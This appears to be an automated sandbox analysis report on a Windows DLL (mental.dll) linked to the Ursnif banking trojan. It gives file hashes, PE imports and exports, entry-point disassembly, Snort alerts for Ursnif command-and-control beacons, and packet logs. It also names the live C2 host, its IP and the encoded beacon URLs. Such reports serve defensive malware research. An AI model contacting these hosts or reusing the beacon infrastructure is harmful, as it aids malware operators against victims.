SSDEEP:	192:r5ZeZr2lWutbificuzMn2b6Z6Bodpt9yasGFV9VtwBaM9Q99s55S9Q9pWS9c9uLk:rvKicO8D4E2eo9g
MD5:	D9D86C47D26D156B082F4BEA659FB4FC
SHA1:	F8F2D0E435E1D6F5C7C160176B306A536794B8C1
SHA-256:	B07EA6732E8BD1AFBFF7DC617880EB9916985849CFD0EC9E3E5B63C809B2B2F0
SHA-512:	AE3B84C757C04840A9DA9AAE1106B477C9F245E5E5F1A6D1AF98FB052BFBD757FBD7AFDE2A4DB941991E3AC7FBC1C0EA6444BC7C8CBC73485B9185D5FFF6C189
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9D47ABEE-EF99-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5962339762347226
Encrypted:	false
SSDEEP:	48:IwkGcprxGwpa1G4pQdGrapbSxGQpBV8GHHpc7TGUpQOBGcpm:r4ZrQn69BSLjR2V6Yg
MD5:	4F7307F79A7D02B37456508FA792BCC1
SHA1:	C3A8746F3E5C74C147D5106D990DA3B420A84055
SHA-256:	5452BB2C125739B50D9C873AEF701C76D715588E60A03EF5FD6D42BB17FD3E57
SHA-512:	2043C7F4BE42DC8982A5E840F6C273D22903261AD54CCC1A53259B05C600D8428F5228F24118603914492E289F350894621829E840A785E3D307E365FDA8736C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A6C9EAC6-EF99-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5991563191902864
Encrypted:	false
SSDEEP:	48:IwYGcprNGwpaRG4pQMGrapbS9GQpBY7GHHpczTGUpQ54MGcpm:rsZXQD6KBSHjF2N66Ig
MD5:	B454F8BD4D78BAC1F27B11D89606531C
SHA1:	1A2DC52E748FC87214E10038160CC91946528B92
SHA-256:	0213C79370DF0B8A0C52AC605E17E5B8FA32E445CC13A572A2F6EF99B8655B9A
SHA-512:	50BAD493E209B593DD79C9AED555D52CBFA52C4E18E8B8DA002FD02303997615F8732FEB81C2E6330E26B9EB384F69830D062FEE29D2F75E8CCB3319C2B33C3B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\610143e0e072b[1].bin Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	258248
Entropy (8bit):	5.999883540264496
Encrypted:	false
SSDEEP:	6144:Qi8AzDRGYmrSXDWNWjqy+g5PCb5ukATGo5G3dNlC0b+391z:Q7AzDrTfc8ywGpNzC0CN1z
MD5:	E2AA0BABB9A68C7C045922635B47BFBE
SHA1:	4EDFE8A6E9A60B77142A7CB52540D4A182758048
SHA-256:	30C03B1CA6E1C248EFC4B91A7672B572CBF5A0DBFB09AA7D1935E841BC6D0A3D
SHA-512:	9D587CC7F4D077F955F75535D297FFD58D63DE51D6E46A597A5493FFCB0A6401ED98B9E2F66016D66EC496E92DA6E67A5F5D58C4B563D9AADC85A57758DC6267
Malicious:	false
IE Cache URL:	http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M
Preview:	bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuuPxkUGJLnhF6WtxHaP54R5UpcHhX1bxT/Ygk+4MGnHGr0roj/d9cPXN2oSESMAVAXEg8or5wPYWqWtD3F3t8A0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\610143ef37a40[1].bin Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	258248
Entropy (8bit):	5.999883540264496
Encrypted:	false
SSDEEP:	6144:Qi8AzDRGYmrSXDWNWjqy+g5PCb5ukATGo5G3dNlC0b+391z:Q7AzDrTfc8ywGpNzC0CN1z
MD5:	E2AA0BABB9A68C7C045922635B47BFBE
SHA1:	4EDFE8A6E9A60B77142A7CB52540D4A182758048
SHA-256:	30C03B1CA6E1C248EFC4B91A7672B572CBF5A0DBFB09AA7D1935E841BC6D0A3D
SHA-512:	9D587CC7F4D077F955F75535D297FFD58D63DE51D6E46A597A5493FFCB0A6401ED98B9E2F66016D66EC496E92DA6E67A5F5D58C4B563D9AADC85A57758DC6267
Malicious:	false
IE Cache URL:	http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z
Preview:	bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuuPxkUGJLnhF6WtxHaP54R5UpcHhX1bxT/Ygk+4MGnHGr0roj/d9cPXN2oSESMAVAXEg8or5wPYWqWtD3F3t8A0

C:\Users\user\AppData\Local\Temp\~DF6E67667E2D178577.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13093
Entropy (8bit):	0.5104081457798227
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loHL9loHL9lWHelYUbGku:kBqoIHsHyHelxPu
MD5:	368B4DE14F0F7C669C1EABB8C67C393F
SHA1:	B51F2803B8E55F38AF75FE9D7178023BEE7E7D38
SHA-256:	6B5210DBCA6A7EAFC783EBC3A7C84D87FE7EFEA2A6656BD9A3A980B6B39115DC
SHA-512:	14995990C875F1247DE4DDEF79462B6ABF92523AD6640464479E6939A13C79ECC077BB2B51C4C5BED98B59D311B1409C2AC210CE5880611A8EA2FC2DEB0CB5DD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8C183346DBFD51CA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.32989653659918533
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwsF9lwVi9l2S/9l2a9w:kBqoxKAuvScS+sWV7S+vOy
MD5:	9692D46F5758C87BB0A508379F8726FE
SHA1:	17DD49A77FA3CA1B8381A7DA8FDF38B3C4CB95FE
SHA-256:	4AD272D238CE09D5E8AFC346A99226EC1E38F620F8BD0D1D4058BB830A3DF2A1
SHA-512:	0FECDFBB9F36F0C0B72D7D50EFF17E9754E3E607A4D4508CB2906C4AF2B136218637F1C65740B247E54199E61693CD67267CF57AA527C18E9B45C6FE1086C877
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC2C22C1E682D9D5C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.32981899390155306
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw8+F9lw8ni9l28c/9lq:kBqoxKAuvScS+FWY75+Y5y
MD5:	47930CE58666CEF0721DE299164C740A
SHA1:	E0BC075290670906E92F2B2BCF4E19832DF54CF4
SHA-256:	8577A62E150E46E0C345DC98A380D5C50907382B8C4F1F2DF2787A7AB422CAEA
SHA-512:	B4C245D5338D601C3EA5DA272DE0E3538716B8315A8A1B76DEAE3B901DA2F61F7E40DF13E1FB46D047114F9BE3B14E9EA06E2375E5981212413E1117EAA9BE0C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.669337136859866
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mental.dll
File size:	363520
MD5:	244fcb71c16ab8163f25c633dcb91b1c
SHA1:	cf0256c44be6b311558358bb00f9ec257ec90236
SHA256:	48589e8612584c5b67c325367e53b63379dbf984a0a0dc905bd29fd3f7fd6c03
SHA512:	8768bcda747665ef22c4ca8208c43ade6397f7792a6b32a8ce37f7630513a684b7c3ab69620d5a74350f00e74ba72393f6ba08cec988172d5e0552161814d5cb
SSDEEP:	6144:BstpyZ+ANKFOVwmBfjdLz5kazt+x1gLY3TGAa7VGpwCu:BstpbAmOOmljdLGeZOGH7Cu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gDL..........T......T......T..;...~.......+.....~......~......~.....Rich...........PE..L....T.U...........!.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10084d4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x55AD541F [Mon Jul 20 20:03:43 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	81dcae87737005169c62f2a77494413a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F54ECD41677h
call 00007F54ECD49C19h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F54ECD4167Ch
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 010550F0h
call 00007F54ECD488F2h
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F54ECD4167Eh
cmp dword ptr [01058DC8h], esi
je 00007F54ECD4175Ah
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F54ECD41677h
cmp esi, 02h
jne 00007F54ECD416A7h
mov ecx, dword ptr [0102F3C4h]
test ecx, ecx
je 00007F54ECD4167Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F54ECD41727h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F54ECD41486h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F54ECD41710h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F54ECD5641Ch
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F54ECD4169Ah
test edi, edi
jne 00007F54ECD41696h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F54ECD56404h
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F54ECD4144Ch
mov eax, dword ptr [0102F3C4h]
test eax, eax
je 00007F54ECD41679h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Rich Headers

Programming Language:

[EXP] VS2013 UPD3 build 30723
[LNK] VS2013 UPD3 build 30723
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x55840	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x558b0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf1000	0x2330	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2e220	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x53e00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c29b	0x2c400	False	0.624470338983	data	6.70528406671	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2e000	0x28268	0x28400	False	0.642626649845	data	5.96206029099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x57000	0x999ec	0x1c00	False	0.317103794643	DOS executable (block device driver ght (c)	3.92757280151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xf1000	0x2330	0x2400	False	0.751193576389	data	6.59555210394	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesA, CreateProcessA, GetEnvironmentVariableA, RemoveDirectoryA, GetDiskFreeSpaceA, GetModuleFileNameA, VirtualProtect, GetCurrentDirectoryA, GetCurrentThreadId, GetTempPathA, CreateFileW, ReadConsoleW, WriteConsoleW, SetStdHandle, OutputDebugStringW, LoadLibraryExW, HeapReAlloc, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetFileType, HeapSize, GetModuleFileNameW, WriteFile, GetStdHandle, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetLastError, HeapFree, HeapAlloc, GetCommandLineA, GetCPInfo, RaiseException, RtlUnwind, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, GetProcAddress, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, IsDebuggerPresent, GetProcessHeap, ExitProcess, GetModuleHandleExW
USER32.dll	GetMessagePos, CheckMenuItem, FindWindowA, UpdateWindow, LoadImageA, DispatchMessageA, ShowWindow, EnumChildWindows, CheckMenuRadioItem, GetAsyncKeyState, GetWindowTextW, GetDC, DrawIcon, IsWindowEnabled, GetClassNameA
ole32.dll	OleUninitialize, OleInitialize, OleSetContainedObject, CLSIDFromString, CoUninitialize, CoInitialize, CoCreateInstance
dhcpcsvc.DLL	DhcpRequestParams, DhcpCApiInitialize, DhcpRegisterParamChange, DhcpCApiCleanup, DhcpUndoRequestParams, DhcpRemoveDNSRegistrations

Exports

Name	Ordinal	Address
Behind	1	0x101d210
Factpresent	2	0x101daf0
Steadunder	3	0x101d0c0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/28/21-13:47:44.437295	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49741	80	192.168.2.4	185.228.233.17
07/28/21-13:47:44.437295	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49741	80	192.168.2.4	185.228.233.17
07/28/21-13:47:58.751058	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49746	80	192.168.2.4	185.228.233.17

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2021 13:47:44.356667995 CEST	49740	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.356739044 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.435774088 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.435945988 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.437294960 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.437637091 CEST	80	49740	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.437787056 CEST	49740	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.559895992 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984083891 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984112024 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984186888 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.984201908 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.984920979 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984992027 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.986373901 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.986587048 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.987365961 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.987401009 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.987436056 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.987457991 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.989960909 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.989990950 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.990114927 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.992269993 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.992300987 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.992418051 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.064274073 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064304113 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064321041 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064336061 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064357996 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064376116 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064409018 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.064451933 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.067833900 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.067868948 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.067910910 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.067996979 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.068030119 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.068057060 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.068119049 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.068129063 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.069256067 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071062088 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071108103 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071186066 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071193933 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071219921 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071239948 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071278095 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071312904 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.073014975 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073043108 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073103905 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.073127985 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073177099 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.073199987 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073241949 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.144730091 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144759893 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144773006 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144783974 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144800901 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144820929 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144841909 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144864082 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144897938 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144933939 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144952059 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144984007 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144999981 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.145100117 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148531914 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148586988 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148618937 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148658037 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148699045 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148739100 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148780107 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148813963 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148838043 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148852110 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148871899 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148884058 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148904085 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148912907 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148932934 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148955107 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148962021 CEST	49741	80	192.168.2.4	185.228.233.17
